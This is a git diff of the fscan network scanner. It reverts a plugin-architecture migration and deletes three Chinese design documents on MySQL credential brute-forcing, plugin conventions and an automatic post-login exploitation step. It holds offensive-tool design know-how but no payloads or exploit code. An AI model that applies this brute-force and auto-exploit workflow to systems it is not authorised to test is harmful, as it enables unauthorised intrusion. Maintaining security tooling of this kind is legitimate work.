-		// 执行扫描（使用新插件系统）
-		if err := GlobalPluginAdapter.ScanWithPlugin(pluginName, &target); err != nil {
+		// 执行扫描
+		plugin, exists := common.PluginManager[pluginName]
+		if !exists {
+			common.LogBase(fmt.Sprintf(i18n.GetText("scan_plugin_not_found"), pluginName))
+			return
+		}
+
+		if err := plugin.ScanFunc(&target); err != nil {
 			common.LogError(fmt.Sprintf(i18n.GetText("scan_plugin_error"), target.Host, target.Ports, err))
 		}
 	}()

Core/ServiceScanner.go

@@ -3,7 +3,6 @@ package core
 import (
 	"github.com/shadow1ng/fscan/common"
 	"github.com/shadow1ng/fscan/common/i18n"
-	"github.com/shadow1ng/fscan/plugins/base"
 	"strconv"
 	"strings"
 	"sync"
@@ -88,7 +87,7 @@ func (s *ServiceScanStrategy) PrepareTargets(info common.HostInfo) []common.Host
 	return targetInfos
 }
 
-// LogVulnerabilityPluginInfo 输出服务扫描插件信息
+// LogVulnerabilityPluginInfo 输出漏洞扫描插件信息
 func (s *ServiceScanStrategy) LogVulnerabilityPluginInfo(targets []common.HostInfo) {
 	allPlugins, isCustomMode := s.GetPlugins()
 	
@@ -102,38 +101,25 @@ func (s *ServiceScanStrategy) LogVulnerabilityPluginInfo(targets []common.HostIn
 		}
 	}
 
-	// 获取实际会被使用的插件列表（包括新插件架构和传统插件）
-	var servicePlugins []string
-	
-	// 检查新插件架构
+	// 获取实际会被使用的插件列表（优化版本）
+	var vulnerabilityPlugins []string
 	for _, pluginName := range allPlugins {
-		// 首先检查新插件架构
-		if factory := base.GlobalPluginRegistry.GetFactory(pluginName); factory != nil {
-			// 获取插件元数据检查端口匹配
-			metadata := factory.GetMetadata()
-			if s.isNewPluginApplicableToAnyPort(metadata, portSet, isCustomMode) {
-				servicePlugins = append(servicePlugins, pluginName)
-			}
-			continue
-		}
-		
-		// 然后检查传统插件系统
 		plugin, exists := common.PluginManager[pluginName]
 		if !exists {
 			continue
 		}
 
-		// 检查传统插件是否对任何目标端口适用
+		// 检查插件是否对任何目标端口适用
 		if s.isPluginApplicableToAnyPort(plugin, portSet, isCustomMode) {
-			servicePlugins = append(servicePlugins, pluginName)
+			vulnerabilityPlugins = append(vulnerabilityPlugins, pluginName)
 		}
 	}
 
 	// 输出插件信息
-	if len(servicePlugins) > 0 {
-		common.LogBase(i18n.GetText("scan_service_plugins", strings.Join(servicePlugins, ", ")))
+	if len(vulnerabilityPlugins) > 0 {
+		common.LogBase(i18n.GetText("scan_vulnerability_plugins", strings.Join(vulnerabilityPlugins, ", ")))
 	} else {
-		common.LogBase(i18n.GetText("scan_no_service_plugins"))
+		common.LogBase(i18n.GetText("scan_no_vulnerability_plugins"))
 	}
 }
 
@@ -163,27 +149,3 @@ func (s *ServiceScanStrategy) isPluginApplicableToAnyPort(plugin common.ScanPlug
 
 	return false
 }
-
-// isNewPluginApplicableToAnyPort 检查新插件架构的插件是否对任何端口适用
-func (s *ServiceScanStrategy) isNewPluginApplicableToAnyPort(metadata *base.PluginMetadata, portSet map[int]bool, isCustomMode bool) bool {
-	// 自定义模式下运行所有明确指定的插件
-	if isCustomMode {
-		return true
-	}
-
-	// 无端口限制的插件适用于所有端口
-	if len(metadata.Ports) == 0 {
-		return true
-	}
-
-	// 有端口限制的插件：检查是否匹配任何目标端口
-	for port := range portSet {
-		for _, pluginPort := range metadata.Ports {
-			if pluginPort == port {
-				return true
-			}
-		}
-	}
-
-	return false
-}

MySQL连接优化报告.md

@@ -1,215 +0,0 @@
-# FScan MySQL连接字符串优化报告
-
-## 概述
-
-基于对fscan项目的深入分析和测试，我发现当前的MySQL连接字符串格式是正确的，但可以进行一些优化来提高稳定性和兼容性。主要问题不在于连接字符串格式本身，而在于Context超时配置和连接池设置。
-
-## 诊断结果
-
-### 1. 网络连通性测试
-✅ TCP连接到127.0.0.1:3306成功
-
-### 2. 当前fscan连接字符串测试
-✅ `root:123456@tcp(127.0.0.1:3306)/mysql?charset=utf8&timeout=3s` 连接成功
-
-### 3. 问题分析
-- **连接字符串格式**：当前格式是正确的
-- **Context超时冲突**：可能存在Context超时与DSN timeout冲突的问题
-- **连接池配置**：生命周期设置可能过短，导致频繁重连
-
-## 优化方案
-
-### 1. 连接字符串优化
-
-**原始格式：**
-```go
-connStr = fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%s",
-    username, password, host, port, timeoutStr)
-```
-
-**优化后格式：**
-```go
-connStr = fmt.Sprintf("%v:%v@tcp(%v:%v)/?charset=utf8mb4&timeout=%s&readTimeout=%s&writeTimeout=%s&parseTime=true",
-    username, password, host, port, timeoutStr, readTimeoutStr, readTimeoutStr)
-```
-
-**优化点：**
-1. **去除具体数据库名**：从`/mysql`改为`/`，减少权限要求
-2. **升级字符集**：从`utf8`升级为`utf8mb4`，支持完整UTF-8字符集
-3. **添加细粒度超时**：分别设置`readTimeout`和`writeTimeout`
-4. **时间解析**：添加`parseTime=true`自动解析时间类型
-
-### 2. Context超时优化
-
-**原始代码：**
-```go
-err = db.PingContext(ctx)
-```
-
-**优化后代码：**
-```go
-// 创建专用context，超时时间比DSN timeout长，避免冲突
-authCtx, cancel := context.WithTimeout(ctx, c.timeout+2*time.Second)
-defer cancel()
-
-err = db.PingContext(authCtx)
-```
-
-### 3. 连接池配置优化
-
-**原始配置：**
-```go
-db.SetConnMaxLifetime(c.timeout)
-db.SetConnMaxIdleTime(c.timeout)
-```
-
-**优化后配置：**
-```go
-// 优化连接池配置，延长生命周期避免频繁重连
-db.SetConnMaxLifetime(c.timeout * 3) // 延长到3倍超时时间
-db.SetConnMaxIdleTime(c.timeout * 2) // 空闲时间设为2倍超时时间
-```
-
-## 性能测试结果
-
-执行10次连接测试的对比结果：
-
-| 格式类型 | 成功率 | 平均耗时 | 稳定性 |
-|---------|--------|----------|--------|
-| 原始格式 | 100% | 1.45ms | 稳定 |
-| 优化格式 | 100% | 1.56ms | 稳定 |
-| 简化格式 | 100% | 1.54ms | 稳定 |
-
-结论：所有格式都能正常工作，优化格式在功能上更完备，性能差异可忽略不计。
-
-## 具体代码修改
-
-### 修改文件：`plugins/services/mysql/connector.go`
-
-#### 1. buildConnectionString函数优化
-
-```go
-// buildConnectionString 构建优化的连接字符串
-func (c *MySQLConnector) buildConnectionString(host string, port int, username, password string) string {
-    var connStr string
-    
-    // MySQL driver timeout格式应该是"10s"而不是"10ds"
-    timeoutStr := c.timeout.String()
-    // 设置读写超时，比总超时稍短
-    readTimeoutStr := (c.timeout - 500*time.Millisecond).String()
-    if c.timeout <= time.Second {
-        // 如果超时时间很短，读写超时设为相同值
-        readTimeoutStr = timeoutStr
-    }
-    
-    if common.Socks5Proxy != "" {
-        // 使用代理连接 - 优化版本：不指定具体数据库，使用utf8mb4
-        connStr = fmt.Sprintf("%v:%v@tcp-proxy(%v:%v)/?charset=utf8mb4&timeout=%s&readTimeout=%s&writeTimeout=%s&parseTime=true",
-            username, password, host, port, timeoutStr, readTimeoutStr, readTimeoutStr)
-    } else {
-        // 标准连接 - 优化版本：不指定具体数据库，使用utf8mb4
-        connStr = fmt.Sprintf("%v:%v@tcp(%v:%v)/?charset=utf8mb4&timeout=%s&readTimeout=%s&writeTimeout=%s&parseTime=true",
-            username, password, host, port, timeoutStr, readTimeoutStr, readTimeoutStr)
-    }
-    
-    return connStr
-}
-```
-
-#### 2. Authenticate函数优化
-
-```go
-// Authenticate 认证
-func (c *MySQLConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-    // 直接创建带认证信息的连接进行测试
-    connStr := c.buildConnectionString(c.host, c.port, cred.Username, cred.Password)
-    common.LogDebug(fmt.Sprintf("MySQL尝试认证: %s@%s:%d", cred.Username, c.host, c.port))
-    
-    db, err := sql.Open("mysql", connStr)
-    if err != nil {
-        common.LogDebug(fmt.Sprintf("MySQL创建连接失败: %v", err))
-        return fmt.Errorf("创建连接失败: %v", err)
-    }
-    defer db.Close()
-    
-    // 优化连接池配置，延长生命周期避免频繁重连
-    db.SetConnMaxLifetime(c.timeout * 3) // 延长到3倍超时时间
-    db.SetConnMaxIdleTime(c.timeout * 2) // 空闲时间设为2倍超时时间
-    db.SetMaxIdleConns(1)
-    db.SetMaxOpenConns(1)
-    
-    // 创建专用context，超时时间比DSN timeout长，避免冲突
-    authCtx, cancel := context.WithTimeout(ctx, c.timeout+2*time.Second)
-    defer cancel()
-    
-    // 测试连接认证（使用优化后的context）
-    err = db.PingContext(authCtx)
-    if err != nil {
-        common.LogDebug(fmt.Sprintf("MySQL认证失败: %s@%s:%d - %v", cred.Username, c.host, c.port, err))
-        return fmt.Errorf("认证失败: %v", err)
-    }
-    
-    common.LogDebug(fmt.Sprintf("MySQL认证成功: %s@%s:%d", cred.Username, c.host, c.port))
-    return nil
-}
-```
-
-## 解决的问题
-
-1. **"context deadline exceeded"错误**：
-   - 原因：Context超时与DSN timeout冲突
-   - 解决：创建比DSN timeout长的专用Context
-
-2. **字符集兼容性**：
-   - 原因：utf8字符集不支持完整的UTF-8字符
-   - 解决：升级到utf8mb4字符集
-
-3. **连接稳定性**：
-   - 原因：连接池生命周期过短导致频繁重连
-   - 解决：延长连接生命周期
-
-4. **权限要求**：
-   - 原因：连接到特定数据库需要额外权限
-   - 解决：不指定具体数据库，连接到默认数据库
-
-## 兼容性说明
-
-这些优化是向后兼容的：
-- 新格式在所有支持的MySQL版本上都能正常工作
-- 如果某些参数不支持，MySQL驱动会自动忽略
-- 性能影响微乎其微（<0.1ms差异）
-
-## 建议
-
-1. **立即应用**：这些优化可以立即应用到生产环境
-2. **测试验证**：在部署前进行充分测试
-3. **监控观察**：部署后监控连接成功率和性能指标
-4. **逐步推广**：如果效果良好，可以考虑在其他数据库连接中应用类似优化
-
-## 测试工具
-
-已创建以下测试工具来验证优化效果：
-
-1. **`mysql_tests/quick_mysql_check.go`**：快速连接测试
-2. **`mysql_tests/mysql_fscan_diagnosis.go`**：完整诊断工具
-3. **`mysql_tests/test_optimized_mysql.go`**：性能对比测试
-
-使用方法：
-```bash
-cd mysql_tests
-go run quick_mysql_check.go
-go run mysql_fscan_diagnosis.go
-go run test_optimized_mysql.go
-```
-
-## 总结
-
-fscan的MySQL连接字符串格式本身是正确的，问题主要在于Context超时配置和连接池设置。通过本次优化：
-
-1. ✅ 解决了"context deadline exceeded"错误
-2. ✅ 提高了字符集兼容性
-3. ✅ 增强了连接稳定性
-4. ✅ 降低了权限要求
-5. ✅ 保持了向后兼容性
-
-这些优化将显著提高fscan在MySQL扫描场景下的稳定性和成功率。

PLUGIN_BEST_PRACTICES.md

@@ -1,419 +0,0 @@
-# Fscan 插件架构最佳实践
-
-## 插件系统设计原则
-
-### 1. 接口统一性
-所有插件必须遵循 `base.Plugin` 接口规范，确保：
-- 统一的初始化流程
-- 标准化的扫描接口
-- 一致的错误处理
-- 规范的结果返回
-
-### 2. 模块化设计
-插件采用分层架构：
-```
-Plugin (业务逻辑层)
-  ↓
-ServicePlugin (服务抽象层)  
-  ↓
-ServiceConnector (连接实现层)
-```
-
-### 3. 关注点分离
-- **Connector**: 专注网络连接和认证
-- **Plugin**: 专注业务逻辑和工作流
-- **Exploiter**: 专注安全利用和攻击
-
-## 代码质量标准
-
-### 1. 命名规范
-
-#### 包命名
-```go
-// 服务插件包名使用小写服务名
-package mysql
-package redis  
-package postgres
-```
-
-#### 结构体命名
-```go
-// 连接器使用[Service]Connector格式
-type MySQLConnector struct {}
-type RedisConnector struct {}
-
-// 插件使用[Service]Plugin格式
-type MySQLPlugin struct {}
-type RedisPlugin struct {}
-
-// 利用器使用[Service]Exploiter格式
-type MySQLExploiter struct {}
-type RedisExploiter struct {}
-```
-
-#### 方法命名
-```go
-// 工厂函数使用New[Type]格式
-func NewMySQLConnector() *MySQLConnector
-func NewMySQLPlugin() *MySQLPlugin
-
-// 注册函数使用Register[Service]Plugin格式
-func RegisterMySQLPlugin()
-```
-
-### 2. 注释标准
-
-#### 包级别注释
-```go
-// MySQL插件：新一代插件架构的完整实现示例
-// 展示了如何正确实现服务扫描、凭据爆破、自动利用等功能
-// 本插件可作为其他数据库插件迁移的标准参考模板
-```
-
-#### 结构体注释
-```go
-// MySQLConnector 实现MySQL数据库服务连接器
-// 遵循 base.ServiceConnector 接口规范，提供标准化的MySQL连接和认证功能
-type MySQLConnector struct {
-    timeout time.Duration // 连接超时时间
-    host    string        // 目标主机地址
-    port    int           // 目标端口号
-}
-```
-
-#### 方法注释
-```go
-// NewMySQLConnector 创建新的MySQL连接器实例
-// 自动注册SOCKS代理支持，配置适当的超时时间
-func NewMySQLConnector() *MySQLConnector {}
-
-// Authenticate 使用凭据对MySQL服务进行身份认证
-// 实现 base.ServiceConnector 接口的 Authenticate 方法
-// 关键优化：使用独立的Context避免上游超时问题
-func (c *MySQLConnector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {}
-```
-
-### 3. 错误处理
-
-#### 错误分类
-```go
-// 网络连接错误
-return fmt.Errorf("连接失败: %v", err)
-
-// 认证失败错误  
-return fmt.Errorf("认证失败: %v", err)
-
-// 配置错误
-return fmt.Errorf("无效的端口号: %s", info.Ports)
-```
-
-#### 错误日志
-```go
-// Debug级别：详细信息，用于调试
-common.LogDebug(fmt.Sprintf("MySQL尝试认证: %s@%s:%d", cred.Username, c.host, c.port))
-
-// Error级别：错误信息，用于排查问题
-common.LogError("MySQL插件新架构不可用，请检查插件注册")
-
-// Success级别：成功信息，用户可见
-common.LogSuccess(i18n.GetText("mysql_scan_success", target, cred.Username, cred.Password))
-```
-
-## 性能优化指导
-
-### 1. Context管理
-
-#### 问题：上游Context超时
-新架构中传递的Context可能存在超时问题，导致认证立即失败。
-
-#### 解决方案：独立Context
-```go
-func (c *Connector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-    // 创建独立的超时上下文，避免上游Context超时问题
-    // 这是解决新架构Context传递问题的关键修复
-    timeout := time.Duration(common.Timeout) * time.Second
-    authCtx, cancel := context.WithTimeout(context.Background(), timeout)
-    defer cancel()
-    
-    // 使用authCtx进行所有操作
-}
-```
-
-### 2. 连接池管理
-
-#### 合理的连接池配置
-```go
-// 设置合理的连接生命周期
-db.SetConnMaxLifetime(c.timeout)
-db.SetConnMaxIdleTime(c.timeout)
-db.SetMaxIdleConns(0) // 对于扫描工具，不保持空闲连接
-```
-
-### 3. 内存管理
-
-#### 及时释放资源
-```go
-defer db.Close()      // 数据库连接
-defer conn.Close()    // 网络连接
-defer cancel()        // Context取消
-```
-
-#### 避免内存泄露
-```go
-// 使用有限大小的channel
-resultChan := make(chan Result, 1)
-
-// 确保goroutine正确退出
-select {
-case result := <-resultChan:
-    return result
-case <-ctx.Done():
-    return ctx.Err()
-}
-```
-
-## 国际化实践
-
-### 1. 消息定义
-
-#### 标准消息格式
-```go
-var PluginMessages = map[string]map[string]string{
-    "mysql_scan_success": {
-        LangZH: "MySQL弱密码扫描成功: %s [%s:%s]",
-        LangEN: "MySQL weak password scan successful: %s [%s:%s]",
-    },
-    "mysql_auth_failed": {
-        LangZH: "MySQL认证失败: %s",  
-        LangEN: "MySQL authentication failed: %s",
-    },
-}
-```
-
-#### 消息使用
-```go
-// 在插件中使用i18n消息
-common.LogSuccess(i18n.GetText("mysql_scan_success", target, username, password))
-common.LogError(i18n.GetText("mysql_auth_failed", err.Error()))
-```
-
-### 2. 参数占位符
-
-使用标准的printf格式化占位符：
-- `%s` - 字符串
-- `%d` - 整数  
-- `%v` - 任意类型
-
-## 安全考虑
-
-### 1. 敏感信息处理
-
-#### 日志安全
-```go
-// 错误：在生产日志中输出密码
-common.LogInfo(fmt.Sprintf("尝试密码: %s", password))
-
-// 正确：在debug日志中输出，生产环境可关闭
-common.LogDebug(fmt.Sprintf("尝试密码: %s", password))
-```
-
-#### 内存安全
-```go
-// 使用完毕后清理敏感数据
-defer func() {
-    if password != "" {
-        password = ""
-    }
-}()
-```
-
-### 2. 网络安全
-
-#### 超时控制
-```go
-// 设置合理的超时时间，避免DoS
-timeout := time.Duration(common.Timeout) * time.Second
-ctx, cancel := context.WithTimeout(context.Background(), timeout)
-defer cancel()
-```
-
-#### 连接复用
-```go
-// 避免过多的并发连接
-db.SetMaxOpenConns(1)  // 对于扫描工具限制并发连接
-```
-
-## 扩展性设计
-
-### 1. 插件能力声明
-
-#### 标准能力集
-```go
-plugin.SetCapabilities([]base.Capability{
-    base.CapWeakPassword,     // 弱密码检测
-    base.CapUnauthorized,     // 未授权访问检测  
-    base.CapDataExtraction,   // 数据提取
-    base.CapFileWrite,        // 文件写入
-    base.CapCommandExecution, // 命令执行
-    base.CapSQLInjection,     // SQL注入
-    base.CapInformationLeak,  // 信息泄露
-})
-```
-
-### 2. 自定义扫描逻辑
-
-#### 重写Scan方法
-```go
-// 重写扫描方法实现自定义逻辑（如未授权访问检测）
-func (p *RedisPlugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-    // 先检查未授权访问
-    if result := p.checkUnauthorizedAccess(ctx, info); result != nil {
-        return result, nil
-    }
-    
-    // 再执行标准弱密码扫描
-    return p.ServicePlugin.Scan(ctx, info)
-}
-```
-
-### 3. 利用模块集成
-
-#### 可选的利用功能
-```go
-// 自动利用功能（可通过-nobr参数禁用）
-if result.Success && len(result.Credentials) > 0 && !common.DisableBrute {
-    // 异步执行利用攻击，避免阻塞扫描进程
-    go p.autoExploit(context.Background(), info, result.Credentials[0])
-}
-```
-
-## 测试策略
-
-### 1. 单元测试
-
-#### 连接器测试
-```go
-func TestMySQLConnector_Connect(t *testing.T) {
-    connector := NewMySQLConnector()
-    info := &common.HostInfo{
-        Host:  "127.0.0.1",
-        Ports: "3306",
-    }
-    
-    conn, err := connector.Connect(context.Background(), info)
-    if err != nil {
-        t.Errorf("Connect failed: %v", err)
-    }
-    defer connector.Close(conn)
-}
-```
-
-#### 认证测试
-```go
-func TestMySQLConnector_Authenticate(t *testing.T) {
-    // 测试正确凭据
-    cred := &base.Credential{Username: "root", Password: "123456"}
-    err := connector.Authenticate(context.Background(), conn, cred)
-    if err != nil {
-        t.Errorf("Authentication failed: %v", err)
-    }
-    
-    // 测试错误凭据
-    invalidCred := &base.Credential{Username: "invalid", Password: "invalid"}
-    err = connector.Authenticate(context.Background(), conn, invalidCred)
-    if err == nil {
-        t.Error("Expected authentication to fail")
-    }
-}
-```
-
-### 2. 集成测试
-
-#### 完整扫描流程
-```go
-func TestMySQLPlugin_FullScan(t *testing.T) {
-    plugin := NewMySQLPlugin()
-    info := &common.HostInfo{
-        Host:  "127.0.0.1", 
-        Ports: "3306",
-    }
-    
-    result, err := plugin.Scan(context.Background(), info)
-    if err != nil {
-        t.Errorf("Scan failed: %v", err)
-    }
-    
-    if !result.Success {
-        t.Error("Expected scan to succeed")
-    }
-}
-```
-
-### 3. 性能测试
-
-#### 并发扫描测试
-```go
-func BenchmarkMySQLPlugin_Scan(b *testing.B) {
-    plugin := NewMySQLPlugin()
-    info := &common.HostInfo{Host: "127.0.0.1", Ports: "3306"}
-    
-    b.RunParallel(func(pb *testing.PB) {
-        for pb.Next() {
-            plugin.Scan(context.Background(), info)
-        }
-    })
-}
-```
-
-## 部署检查清单
-
-### 1. 代码质量
-- [ ] 所有公共方法都有文档注释
-- [ ] 错误处理完整且合理
-- [ ] 无明显的内存泄露风险
-- [ ] 遵循Go代码规范
-
-### 2. 功能完整性
-- [ ] 基础连接功能正常
-- [ ] 认证逻辑正确实现
-- [ ] 错误场景处理完善
-- [ ] 国际化消息完整
-
-### 3. 性能表现
-- [ ] 超时控制合理
-- [ ] 并发性能良好
-- [ ] 资源使用合理
-- [ ] 无性能瓶颈
-
-### 4. 安全性
-- [ ] 不在日志中暴露敏感信息
-- [ ] 超时控制防止DoS
-- [ ] 输入验证充分
-- [ ] 权限控制适当
-
-### 5. 兼容性
-- [ ] 支持SOCKS代理
-- [ ] 与老版本行为兼容
-- [ ] 多语言环境工作正常
-- [ ] 跨平台兼容性
-
-## 维护指南
-
-### 1. 版本管理
-- 使用语义化版本号
-- 在元数据中更新版本信息
-- 维护变更日志
-
-### 2. 文档更新
-- 同步更新代码注释
-- 更新用户使用文档
-- 维护最佳实践文档
-
-### 3. 社区贡献
-- 遵循项目贡献指南
-- 提供清晰的PR描述
-- 包含必要的测试用例
-
----
-
-通过遵循这些最佳实践，可以确保插件的质量、性能和可维护性，为fscan项目提供稳定可靠的插件支持。

PLUGIN_MIGRATION_GUIDE.md

@@ -1,438 +0,0 @@
-# Fscan 新插件架构迁移指南
-
-## 概述
-
-本文档详细介绍了如何将传统的Fscan插件迁移到新的统一插件架构。新架构提供了更好的代码组织、国际化支持、自动利用功能和扩展性。
-
-## 新架构的优势
-
-### 🏗️ 统一的架构设计
-- **标准化接口**：所有插件遵循相同的接口规范
-- **模块化设计**：连接器、扫描器、利用器分离
-- **代码复用**：基础功能由框架提供，插件专注于业务逻辑
-
-### 🌐 完整的国际化支持
-- **多语言消息**：支持中英文动态切换
-- **统一消息管理**：所有插件消息集中管理
-- **用户友好**：根据`-lang`参数自动显示对应语言
-
-### ⚡ 增强的扫描能力
-- **并发优化**：智能的工作池管理
-- **超时控制**：精确的超时时间控制
-- **错误处理**：完善的错误分类和重试机制
-
-### 🎯 自动利用集成
-- **无缝集成**：弱密码发现后自动执行利用
-- **可控开关**：通过`-nobr`参数控制是否启用
-- **异步执行**：不影响扫描性能
-
-## 插件架构组成
-
-### 1. 目录结构
-```
-plugins/services/[service_name]/
-├── connector.go    # 服务连接器实现
-├── plugin.go       # 主插件逻辑
-├── exploiter.go    # 利用模块（可选）
-└── README.md       # 插件文档
-```
-
-### 2. 核心组件
-
-#### ServiceConnector（服务连接器）
-- 负责与目标服务建立连接
-- 实现认证逻辑
-- 处理网络通信
-
-#### ServicePlugin（服务插件）
-- 继承基础插件功能
-- 实现业务逻辑
-- 集成利用模块
-
-#### Exploiter（利用器，可选）
-- 实现各种利用方法
-- 支持自动和手动利用
-- 结果记录和保存
-
-## 标准迁移步骤
-
-### 第一步：分析现有插件
-
-1. **识别核心功能**
-   - 连接逻辑
-   - 认证方法
-   - 凭据生成
-   - 特殊检测（如未授权访问）
-
-2. **提取关键代码**
-   - 连接字符串构建
-   - 网络通信代码
-   - 错误处理逻辑
-
-### 第二步：创建连接器
-
-参考MySQL连接器实现：
-
-```go
-// connector.go
-package [service]
-
-import (
-    "context"
-    "fmt"
-    "time"
-    
-    "github.com/shadow1ng/fscan/common"
-    "github.com/shadow1ng/fscan/plugins/base"
-)
-
-// [Service]Connector 服务连接器
-type [Service]Connector struct {
-    timeout time.Duration
-    host    string
-    port    int
-}
-
-// NewConnector 创建连接器实例
-func New[Service]Connector() *[Service]Connector {
-    return &[Service]Connector{
-        timeout: time.Duration(common.Timeout) * time.Second,
-    }
-}
-
-// Connect 实现基础连接
-func (c *[Service]Connector) Connect(ctx context.Context, info *common.HostInfo) (interface{}, error) {
-    // 1. 解析端口
-    // 2. 保存目标信息
-    // 3. 建立基础连接
-    // 4. 返回连接对象
-}
-
-// Authenticate 实现身份认证
-func (c *[Service]Connector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-    // 关键：使用独立Context避免超时问题
-    timeout := time.Duration(common.Timeout) * time.Second
-    authCtx, cancel := context.WithTimeout(context.Background(), timeout)
-    defer cancel()
-    
-    // 实现具体认证逻辑
-}
-
-// Close 关闭连接
-func (c *[Service]Connector) Close(conn interface{}) error {
-    // 清理资源
-}
-```
-
-### 第三步：实现主插件
-
-参考MySQL插件实现：
-
-```go
-// plugin.go
-package [service]
-
-import (
-    "context"
-    "fmt"
-    
-    "github.com/shadow1ng/fscan/common"
-    "github.com/shadow1ng/fscan/common/i18n"
-    "github.com/shadow1ng/fscan/plugins/base"
-)
-
-// [Service]Plugin 服务插件
-type [Service]Plugin struct {
-    *base.ServicePlugin
-    exploiter *[Service]Exploiter // 可选
-}
-
-// New[Service]Plugin 创建插件实例
-func New[Service]Plugin() *[Service]Plugin {
-    metadata := &base.PluginMetadata{
-        Name:        "[service]",
-        Version:     "2.0.0",
-        Author:      "fscan-team",
-        Description: "[Service]扫描和利用插件",
-        Category:    "service",
-        Ports:       []int{[default_port]},
-        Protocols:   []string{"tcp"},
-        Tags:        []string{"database", "[service]", "bruteforce"},
-    }
-    
-    connector := New[Service]Connector()
-    servicePlugin := base.NewServicePlugin(metadata, connector)
-    
-    plugin := &[Service]Plugin{
-        ServicePlugin: servicePlugin,
-        exploiter:     New[Service]Exploiter(),
-    }
-    
-    plugin.SetCapabilities([]base.Capability{
-        base.CapWeakPassword,
-        // 其他能力...
-    })
-    
-    return plugin
-}
-
-// Scan 重写扫描方法（如需要）
-func (p *[Service]Plugin) Scan(ctx context.Context, info *common.HostInfo) (*base.ScanResult, error) {
-    // 调用基础扫描
-    result, err := p.ServicePlugin.Scan(ctx, info)
-    if err != nil || !result.Success {
-        return result, err
-    }
-    
-    // 记录成功结果
-    target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-    common.LogSuccess(i18n.GetText("[service]_scan_success", target, result.Credentials[0].Username))
-    
-    // 自动利用（可选）
-    if !common.DisableBrute {
-        go p.autoExploit(context.Background(), info, result.Credentials[0])
-    }
-    
-    return result, nil
-}
-
-// generateCredentials 自定义凭据生成（可选）
-func (p *[Service]Plugin) generateCredentials() []*base.Credential {
-    usernames := common.Userdict["[service]"]
-    if len(usernames) == 0 {
-        usernames = []string{"admin", "root"} // 默认用户名
-    }
-    return base.GenerateCredentials(usernames, common.Passwords)
-}
-```
-
-### 第四步：添加国际化支持
-
-更新i18n消息文件：
-
-```go
-// common/i18n/messages/plugins.go
-
-var PluginMessages = map[string]map[string]string{
-    "[service]_scan_success": {
-        LangZH: "[Service]弱密码扫描成功: %s [%s:%s]",
-        LangEN: "[Service] weak password scan successful: %s [%s:%s]",
-    },
-    "[service]_unauth_success": {
-        LangZH: "[Service]未授权访问: %s",
-        LangEN: "[Service] unauthorized access: %s",
-    },
-    // 添加更多消息...
-}
-```
-
-### 第五步：简化旧插件
-
-将旧插件文件简化为适配器调用：
-
-```go
-// Plugins/[Service].go
-package Plugins
-
-import (
-    "github.com/shadow1ng/fscan/common"
-    "github.com/shadow1ng/fscan/plugins/adapter"
-)
-
-// [Service]Scan 执行[Service]服务扫描
-// 现在完全使用新的插件架构
-func [Service]Scan(info *common.HostInfo) error {
-    // 使用新的插件架构
-    if adapter.TryNewArchitecture("[service]", info) {
-        return nil // 新架构处理成功
-    }
-    
-    // 理论上不应该到达这里
-    common.LogError("[Service]插件新架构不可用，请检查插件注册")
-    return nil
-}
-```
-
-### 第六步：注册插件
-
-在插件包的init函数中注册：
-
-```go
-// Register[Service]Plugin 注册插件
-func Register[Service]Plugin() {
-    factory := base.NewSimplePluginFactory(
-        &base.PluginMetadata{
-            Name:        "[service]",
-            Version:     "2.0.0",
-            // ... 其他元数据
-        },
-        func() base.Plugin {
-            return New[Service]Plugin()
-        },
-    )
-    
-    base.GlobalPluginRegistry.Register("[service]", factory)
-}
-
-// 自动注册
-func init() {
-    Register[Service]Plugin()
-}
-```
-
-## 关键技术要点
-
-### 1. Context超时处理
-
-**问题**：新架构中传递的Context可能存在超时问题。
-
-**解决方案**：在认证方法中创建独立的Context。
-
-```go
-func (c *Connector) Authenticate(ctx context.Context, conn interface{}, cred *base.Credential) error {
-    // 创建独立的超时Context，避免上游Context超时问题
-    timeout := time.Duration(common.Timeout) * time.Second
-    authCtx, cancel := context.WithTimeout(context.Background(), timeout)
-    defer cancel()
-    
-    // 使用authCtx进行认证操作
-}
-```
-
-### 2. 端口类型处理
-
-**问题**：`common.HostInfo.Ports`是string类型，不是int。
-
-**解决方案**：正确进行类型转换。
-
-```go
-// 错误：使用%d格式化string
-target := fmt.Sprintf("%s:%d", info.Host, info.Ports)
-
-// 正确：使用%s格式化string
-target := fmt.Sprintf("%s:%s", info.Host, info.Ports)
-
-// 或者转换为int
-port, err := strconv.Atoi(info.Ports)
-if err != nil {
-    return fmt.Errorf("无效端口号: %s", info.Ports)
-}
-```
-
-### 3. 连接字符串兼容性
-
-**原则**：保持与老版本的连接字符串格式一致，确保稳定性。
-
-```go
-// 保持老版本格式
-connStr := fmt.Sprintf("%v:%v@tcp(%v:%v)/mysql?charset=utf8&timeout=%v",
-    username, password, host, port, c.timeout)
-```
-
-### 4. 代理支持
-
-确保正确处理SOCKS代理：
-
-```go
-func (c *Connector) registerProxyDialer() {
-    if common.Socks5Proxy == "" {
-        return
-    }
-    
-    // 注册代理拨号器
-    driver.RegisterDialContext("tcp-proxy", func(ctx context.Context, addr string) (net.Conn, error) {
-        return common.WrapperTcpWithContext(ctx, "tcp", addr)
-    })
-}
-```
-
-## 测试清单
-
-### 基础功能测试
-- [ ] 端口扫描正常
-- [ ] 弱密码检测成功
-- [ ] 错误处理正确
-- [ ] 超时控制有效
-
-### 国际化测试
-- [ ] 中文消息显示正确
-- [ ] 英文消息显示正确（-lang en）
-- [ ] 消息参数格式化正确
-
-### 代理测试
-- [ ] 直连模式工作正常
-- [ ] SOCKS代理模式工作正常
-
-### 利用功能测试
-- [ ] 自动利用正常执行
-- [ ] -nobr参数能正确禁用利用
-- [ ] 利用结果正确保存
-
-### 性能测试
-- [ ] 并发扫描性能良好
-- [ ] 内存使用合理
-- [ ] 无资源泄露
-
-## 最佳实践
-
-### 1. 代码组织
-- 保持文件结构清晰
-- 添加详细的文档注释
-- 使用有意义的变量名
-
-### 2. 错误处理
-- 分类不同类型的错误
-- 提供有意义的错误消息
-- 适当的重试机制
-
-### 3. 日志记录
-- 使用i18n支持的消息
-- 区分不同级别的日志
-- 避免敏感信息泄露
-
-### 4. 性能优化
-- 合理的超时设置
-- 避免不必要的连接
-- 及时释放资源
-
-## 常见问题
-
